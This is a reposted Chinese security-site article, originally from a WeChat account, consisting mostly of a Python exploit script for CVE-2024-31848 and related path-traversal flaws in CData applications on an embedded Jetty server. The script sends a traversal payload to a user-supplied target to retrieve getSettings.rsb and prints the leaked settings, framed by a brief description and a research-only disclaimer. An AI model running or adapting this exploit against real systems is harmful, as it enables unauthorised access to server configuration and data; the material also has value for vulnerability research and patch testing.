cve-2024-31848

admin
admin
admin
140526
文章
117
评论
2024年5月8日10:05:46评论73 views字数 2383阅读7分56秒阅读模式
影响描述

    一个原型PoC,用于在嵌入式Jetty服务器上运行CData应用程序的目标上自动化漏洞分析。

只需使用-u或--url来指定目标,脚本就会尝试检索getSettings.rsb?文件,存在于所有CData实例中。

poc&exp

import requests
import argparse
from urllib3.exceptions import InsecureRequestWarning
from urllib.parse import urlparse
import json

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

GREEN = "\033[92m"
RED = "\033[91m"
RESET = "\033[0m"

def banner():
    print(f"""
          
       

 _______  _______  _______    ______   _______ _________ _______ 
(  ____ \(  ____ \(  ____ \  (  __  \ (  ___  )\__   __/(  ___  )
| (    \/| (    \/| (    \/  | (  \  )| (   ) |   ) (   | (   ) |
| (_____ | (__    | (__      | |   ) || (___) |   | |   | (___) |
(_____  )|  __)   |  __)     | |   | ||  ___  |   | |   |  ___  |
      ) || (      | (        | |   ) || (   ) |   | |   | (   ) |
/\____) || (____/\| (____/\  | (__/  )| )   ( |   | |   | )   ( |
\_______)(_______/(_______/  (______/ |/     \|   )_(   |/     \|
                                                                 


 """)
    print(f"{RED}CVE-2024-31848/31849/31850/31851{RESET}")
    print(f"{RED}Exploiting Path Traversal Vulnerabilities within CDATA on an Embedded Jetty Server.{RESET}")
    print(f"{RED}Developer: @Stuub{RESET}\n")

def isAlive(url):
    try:
        response = requests.get(url, verify=False)
        return True if response.status_code == 200 else False
    except Exception as e:
        return False

def hostHeader(url):
    parsed_url = urlparse(url)
    return parsed_url.netloc

def formatResponse(response):
    if response is not json:
        print(response.text)
        exit(0)
    
    try:
        response_json = response.json()
        return json.dumps(response_json, indent=4)
    except json.JSONDecodeError:
        return "Response is not a JSON"

def makeRequest(url, host, payload):
    headers = {
        "Host": host,
        "Referer": url,
    }

    if url.endswith("/"):
        url = url[:-1]
    
    response = requests.get(f"{url}/{payload}", headers=headers, verify=False)
    print(f"{GREEN}[+]{RESET} Request URL: {response.url}")
    return response

def exploit(url, payload=None):
    print(f"{GREEN}[+]{RESET} Target: {url}")
    print(f"{GREEN}[+]{RESET} Exploiting...")

    host = hostHeader(url)
    payload = "ui/..\src\getSettings.rsb?@json"

    response = makeRequest(url, host, payload)
    handleResponse(response)

def handleResponse(response):
    pretty_json = formatResponse(response)
    if pretty_json == "Response is not a JSON":
        print(f"{RED}[-]{RESET} Response is not a JSON")
        print(f"Response: {response.text}")
    elif response.status_code == 200:
        print(f"{GREEN}[+]{RESET} Exploited successfully")
        print(pretty_json)
    else:
        print(f"{RED}[-]{RESET} Exploitation failed")
        print(f"Status code: {response.status_code}")
        print(f"Response: {pretty_json}")


def main():
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-31848')
    parser.add_argument('-u', '--url', help='Target URL', required=True)
    args = parser.parse_args()

    url = args.url
    banner()
    exploit(url)

if __name__ == "__main__":
    main()

 

原文始发于微信公众号(漏洞猎人):cve-2024-31848

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月8日10:05:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cve-2024-31848https://cn-sec.com/archives/2718593.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息